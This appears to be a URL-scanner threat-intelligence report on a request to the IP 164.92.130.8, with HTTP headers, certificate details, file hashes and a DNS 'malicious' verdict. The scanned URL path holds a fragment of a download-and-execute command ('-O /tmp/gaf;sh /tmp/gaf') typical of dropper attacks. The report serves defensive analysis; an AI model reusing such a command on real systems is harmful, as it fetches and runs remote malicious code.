| 164.92.130.8/bin+-O+/tmp/gaf;sh+/tmp/gaf | 164.92.130.8 | 421 Misdirected Request | 166 B |
URL User Request GET HTTP/2164.92.130.8/bin+-O+/tmp/gaf;sh+/tmp/gaf IP164.92.130.8:443 ASN#14061 DIGITALOCEAN-ASN
CertificateIssuerDigiCert Inc Subject*.rumble.com Fingerprint2D:00:5D:0C:53:BD:BE:47:1E:63:45:8E:AC:B3:87:DD:48:26:CE:04 ValidityWed, 06 Dec 2023 00:00:00 GMT - Tue, 10 Dec 2024 23:59:59 GMT
File typeHTML document, ASCII text, with CRLF line terminators Hash67cedc3d29f84b88e784d61970ab7eda 0604623a8cc63fcf32923849dd92f05eea50a0ed 6823ca59909caa756c0390769fe892622a3fa93b3ba7d5dadc925a5cd5a5a624
Analyzer | Verdict | Alert | Quad9 DNS | malicious | Sinkholed |
GET /bin+-O+/tmp/gaf;sh+/tmp/gaf HTTP/1.1
Host: 164.92.130.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 421 Misdirected Request
server: openresty
date: Fri, 26 Apr 2024 21:15:20 GMT
content-type: text/html; charset=utf-8
content-length: 166
strict-transport-security: max-age=31536000; includeSubDomains
X-Firefox-Spdy: h2
|
IP164.92.130.8:443 ASN#14061 DIGITALOCEAN-ASN
Requested byhttps://164.92.130.8/bin+-O+/tmp/gaf;sh+/tmp/gaf CertificateIssuerDigiCert Inc Subject*.rumble.com Fingerprint2D:00:5D:0C:53:BD:BE:47:1E:63:45:8E:AC:B3:87:DD:48:26:CE:04 ValidityWed, 06 Dec 2023 00:00:00 GMT - Tue, 10 Dec 2024 23:59:59 GMT
File typeMS Windows icon resource - 1 icon, 64x64, 32 bits/pixel Hashb2e6f7f4fe0bd1fdb4befd62dcd88a56 f9f242d8f5258717eb44a31b1c09a4e84f540228 d7092ed3e514d81df6dbc631065499480047d6f23b8c6db40245f3144f56964e
Analyzer | Verdict | Alert | Quad9 DNS | malicious | Sinkholed |
GET /favicon.ico HTTP/1.1
Host: 164.92.130.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://164.92.130.8/bin+-O+/tmp/gaf;sh+/tmp/gaf
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
server: openresty
date: Fri, 26 Apr 2024 21:15:21 GMT
content-type: image/x-icon
last-modified: Tue, 26 Sep 2023 11:14:37 GMT
vary: Accept-Encoding, Accept-Encoding
etag: W/"6512bd1d-423e"
cache-control: public,max-age=31536000,immutable,stale-if-error=31536000,stale-while-revalidate=31536000
strict-transport-security: max-age=31536000;includeSubDomains;preload
content-encoding: br
X-Firefox-Spdy: h2
|